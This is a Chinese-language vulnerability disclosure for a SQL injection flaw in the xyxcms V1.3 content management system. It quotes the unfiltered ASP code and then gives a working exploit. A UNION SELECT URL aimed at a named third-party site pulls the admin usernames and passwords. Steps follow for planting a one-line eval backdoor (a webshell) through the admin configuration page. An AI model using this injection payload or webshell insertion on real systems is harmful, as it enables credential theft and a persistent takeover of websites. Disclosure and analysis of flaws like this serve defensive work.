xyxcms V1.3正式版SQL注入漏洞

发布日期：2010-12.14
发布作者：闷豆、

影响版本：V1.3 正式版
官方网站：http://www.xyxcms.com/

漏洞类型：SQL注入
漏洞描述：xyxcms V1.3程序未对提交参数进行严格过滤，导致SQL注入漏洞。

漏洞分析：漏洞文件 cms.asp

act=request("action")  id=trim(request("id"))   ................'省略  if act="getding" then call getding  ....................'省略   sub getding  id=request("id") '没过滤  set rs=server.createobject("adodb.recordset")  sql="select ding from flash where id="&id  rs.open sql,conn,1,1  if not rs.eof then  if isnull(rs(0)) then  response.Write(0)  else  response.Write(rs(0))  end if  else  response.Write(0)  end if  rs.close  set rs=nothing end sub  

漏洞利用：exp

http://www.hackline.net/cms.asp?action=getding&id=-1+union+select+username%2b'%3d'%2bpassword+from+admin

后台拿webshell:

admin/admin_config.asp

网站地址：  插入 ":eval request("1"):'

inc/config.asp  一句话后门

 

标签分类：